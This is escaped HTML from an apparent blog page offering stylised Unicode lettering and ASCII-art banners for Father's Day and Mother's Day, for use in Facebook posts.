&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;HΔƤƤΨ FΔƬHΣΓ'Ѕ DΔΨ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;んﾑｱｱﾘ ｷﾑｲん乇尺'丂 Ðﾑﾘ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ɦǟքքʏ ʄǟȶɦɛʀ'ֆ ɖǟʏ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ӇƛƤƤƳ ƑƛƬӇЄƦ'Ƨ ƊƛƳ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ἬᾋƤƤὛ ҒᾋҬἬἝȒ'Ṩ ƉᾋὛ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ⓗⓐⓟⓟⓨ ⓕⓐⓣⓗⓔⓡ'ⓢ ⓓⓐⓨ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;[̲̅h̲̅][̲̅a̲̅][̲̅p̲̅][̲̅p̲̅][̲̅y̲̅] [̲̅f̲̅][̲̅a̲̅][̲̅t̲̅][̲̅h̲̅][̲̅e̲̅][̲̅r̲̅]'[̲̅s̲̅] [̲̅d̲̅][̲̅a̲̅][̲̅y̲̅]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75; font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;b&gt;I love you father:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ι ℓσνє уσυ ƒαтнєя&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ι ♥ уσυ ƒαтнєя&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ï ℓσ√ε γσų ∱ąŧɧεŗ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;Ɩ ԼƠƔЄ ƳƠƲ ƑƛƬӇЄƦ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ɹǝ4ʇɐɟ noʎ ǝʌoן ı&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ï ﾚ⊕∀ε ψ⊕u ƒα†hεr&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ⓘ ⓛⓞⓥⓔ ⓨⓞⓤ ⓕⓐⓣⓗⓔⓡ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;[̲̅i̲̅] [̲̅l̲̅][̲̅o̲̅][̲̅v̲̅][̲̅e̲̅] [̲̅y̲̅][̲̅o̲̅][̲̅u̲̅] [̲̅f̲̅][̲̅a̲̅][̲̅t̲̅][̲̅h̲̅][̲̅e̲̅][̲̅r̲̅]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75; font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;b&gt;I love you dad:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ι ℓσνє уσυ ∂α∂&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ï ℓσ√ε γσų đąđ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ï ♥ γσų đąđ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;I LΘƲΣ ΨΘƱ DΔD&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;i lΦvę ყΦЦ DǞD&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;Ἷ ĿὋVἝ ὛὋȖ ƉᾋƉ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;Ī Ŀ♡ѴƐ Y♡Ʊ DΛD&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;[̲̅i̲̅] [̲̅l̲̅][̲̅o̲̅][̲̅v̲̅][̲̅e̲̅] [̲̅y̲̅][̲̅o̲̅][̲̅u̲̅] [̲̅d̲̅][̲̅a̲̅][̲̅d̲̅]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000; font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;b&gt;• Father's day facebook symbols banners:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;. . . . . _♥________________&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;. .____| . . . .FATHER'S. . . .. |____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;. .\ . . .|. . . . . &amp;nbsp;DAY . . . . . . | . . ./&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;. .&amp;gt; . . |'•______Ƹ̵̡Ӝ̵̨̄Ʒ______•|. . .&amp;lt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;. ./______) . . . . . . °ღ . . (______\&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;............(0 0)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;.---oOO-- (_)-----.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╔═════════════════╗&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;║ ♦ Happy father's day! ♣║&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╚═════════════════╝&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;'----------------------oOO&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;........|__|__|&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;.......... || ||&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;....... ooO Ooo&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;♫ .♥.•* ★¨`*•♫.•´*.¸.•´♥ ♫&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;☀ Happy ☀ Fathers ☀ Day ☀&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;♫ .♥.•* ☀¨`*•♫.•´*.¸☀.•´♥&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;┊ ┊┊ ┊☀┊ ┊ ┊┊ ☀ه&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ه┊ ☀ ┊ ┊ ི♥ྀ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;☀ ┊┊ ☀ه&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ه┊ ☀&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╔═════════════ ஜ۩۞۩ஜ ════════════╗&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;`·.·★·.·´¯`·.·★ нαρρу ƒαтнєя'ѕ ∂αу &amp;nbsp;★·.·´¯`·.·★·.·´&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╚═════════════ ஜ۩۞۩ஜ ════════════╝&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;::: (\_(\ ...*...*...*...*...*...*...*...*...*...*...*...*&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;*: (=' :') ::::::::::: I ♥ you Dad ::::::::::::::::::&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;•.. (,('')('')¤...*...*...*...*...*...*...*...*...*...*...*&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000; font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;b&gt;• Facebook symbols big shapes. Father's day ascii art:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╔╗╔╗─────────────╔═╦═╦═╗&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;║║║╠═╦╦╦═╗╔╦╦═╦╦╗║║║╬║║║▄██▄██▄&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;║║║║╬║║║╩╣║║║╬║║║║║║║║║║▀█████▀&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╚╝╚╩═╩═╩═╝╠╗╠═╩═╝╚═╩╩╩═╝──▀█▀&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;──────────╚═╝&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╔═══╗───╔╗╔╗──────────╔═══╗&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;║╔══╝──╔╝╚╣║──────────╚╗╔╗║&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;║╚══╦══╬╗╔╣╚═╦══╦═╦══╗─║║║╠══╦╗─╔╗&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;║╔══╣╔╗║║║║╔╗║║═╣╔╣══╣─║║║║╔╗║║─║║&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;║║──║╔╗║║╚╣║║║║═╣║╠══║╔╝╚╝║╔╗║╚═╝║&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╚╝──╚╝╚╝╚═╩╝╚╩══╩╝╚══╝╚═══╩╝╚╩═╗╔╝&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;─────────────────────────────╔═╝║&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;─────────────────────────────╚══╝&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;┏━━━┓╋╋╋┏┓┏┓╋╋╋╋╋╋╋╋╋╋┏━━━┓&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;┃┏━━┛╋╋┏┛┗┫┃╋╋╋╋╋╋╋╋╋╋┗┓┏┓┃&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;┃┗━━┳━━╋┓┏┫┗━┳━━┳━┳━━┓╋┃┃┃┣━━┳┓╋┏┓&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;┃┏━━┫┏┓┃┃┃┃┏┓┃┃━┫┏┫━━┫╋┃┃┃┃┏┓┃┃╋┃┃&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;┃┃╋╋┃┏┓┃┃┗┫┃┃┃┃━┫┃┣━━┃┏┛┗┛┃┏┓┃┗━┛┃&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;┗┛╋╋┗┛┗┛┗━┻┛┗┻━━┻┛┗━━┛┗━━━┻┛┗┻━┓┏┛&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋┏━┛┃&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋┗━━┛&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d; font-family: verdana; font-size: large; line-height: 16px;"&gt;&lt;b&gt;Mother's day facebook symbols:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d; font-family: verdana; font-size: large; line-height: 16px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;╔══════════════════╗&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;║.(¯`♥´¯)´´¯`•°*”˜˜”*°•. ƸӜƷ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;║.`*.¸.*.•°*”˜˜”*°•.ƸӜƷ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;║.•°*”˜˜”*°•.ƸӜƷ ✶* ¸ .✫ ♥&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;║✿ нαppy мoтнer´ѕ dαy ✿&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;╚══════════════════╝&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;............(0 0)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;.---oOO-- (_)-----.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;╔═════════════════╗&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;║♥Happy Mother's day!♥║&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;╚═════════════════╝&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;'----------------------oOO&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;........|__|__|&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
